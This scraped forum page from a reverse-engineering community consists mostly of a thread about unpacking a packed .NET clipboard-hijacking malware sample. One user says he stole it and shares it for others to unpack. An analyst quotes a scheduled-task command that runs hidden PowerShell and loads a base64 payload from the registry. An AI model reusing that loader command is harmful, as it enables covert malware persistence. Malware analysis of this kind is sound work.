Jump to content
Tuts 4 You

Forums

  1. Community Discussions

    1. Terms, Privacy Policy & Frequently Asked Questions   (151,092 visits to this link)

      Very important! Please read before sign up and posting...

    2. General Discussions and Off Topic

      General and off-topic conversations and discussions here...

      12.9k
      posts
    3. Artscene Community

      Share graphic, ASCII, module, demo, intro ideas and works...

      7.4k
      posts
    4. Site Bug Reports and Feedback

      Bugs, feedback and ideas regarding this site...

      2.2k
      posts
  2. Reverse Code Engineering

    1. Challenge of Reverse Engineering

      Try a challenge or contribute your own, any platform or operating system...

      13.3k
      posts
    2. Hardware Reverse Engineering

      Reverse engineering of circuitry hardware and firmware...

      191
      posts
    3. Network Security

      Discussions on network security, holes, exploits and other issues...

      454
      posts
    4. Malware Reverse Engineering

      Debugging, disassembling and documenting interesting malware...

      1.5k
      posts
    5. Reverse Engineering Articles

      Share an interesting blog, news page or other RE related site...

      1.9k
      posts
    6. Employment and Careers

      Discussions on employment and career paths in the industry...

      157
      posts
  3. Developers Forums

    1. Programming and Coding

      Programming and coding tips, help and solutions...

      12k
      posts
    2. Programming Resources

      Share an interesting blog, news page or other resource...

      307
      posts
    3. Software Security

      Securing your software against reverse engineering...

      764
      posts
  4. Community Projects

    1. Scylla Imports Reconstruction

      Development and support forum for the Scylla project...

      497
      posts
    2. x64dbg

      An open-source x64/x32 debugger for windows...

      1.2k
      posts
    3. Future Community Projects

      Looking for support and interested partners for a future project?

      130
      posts
    4. Community Projects Archive

      Old and inactive projects moved to long term support...

      803
      posts
  • Member Statistics

    15,268
    Total Members
    7,713
    Most Online
    daredevil
    Newest Member
    daredevil
    Joined
  • Posts

    • Darth Blue
      Hello guys. the command `bphws $abc, 'r'` puts a hardware breakpoint on execute. But, what i want to do via command is to `breakpoint > on acces > dword`. You know you can do this right click on **DUMP** window and select `breakpoint > on access > dword`. I have searched: Google x64dbg documentation tuts4you forums Unfortunately i couldn't find a way to do that. Did i miss something? P.S I need this because i am writing a script.   Thank you :)
    • BlackHat
      Unpacked this Crap LOL   Here You go with the File. Kthmngiucgrhcdpxszzwg_BH_unp.dll
    • JoseCmanXDll
      yep he tried to bypass windows defender to make payload run on memory there by converting his payload to base64 i see. ( based on powershell command ) with those strong packers i dont think its possible to unpack crap 
    • Apuromafo
      some simple only for  analisis: step 0:  exe in dnspy   step 1: resource extract and save as .zip step 2: .exe in that zip, is the program(malware ) dll  in .net packed with Microsoft Visual C# / Basic.NET  - * IntelliLock v.1.5.x.0 ( .NET Reactor* )  (Kthmngiucgrhcdpxszzwg.dll)  there is executed with some like this:   C:\Windows\System32\schtasks.exe" /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" virustotal: https://www.virustotal.com/gui/file/5694a409003d8f855a17761d9ebce7cfd0f30490fa5340d9a3e1b55ce75cd5be/behavior   Processes Created C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Shell Commands schtasks /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" Processes Terminated C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Processes Tree 2120 - Unpack me.exe 2628 - C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) packer? vmprotect +intellilock , or some ofuscator like ILProtector +intellilock    Best regards Apuromafo  
    • JoseCmanXDll
      this malware belongs to some famous coders he sell it for over (100$) i somehow managed to steal it from someone who bought it its a malware it uses power shell, it only access clipboard to replace it but dosent steal data i dont know more about it. the packer had me so much confused unpack if u can. edit: if it got unpacked i will share the seller website! Unpack me.rar
  • File Comments

  • Downloads

×
×
  • Create New...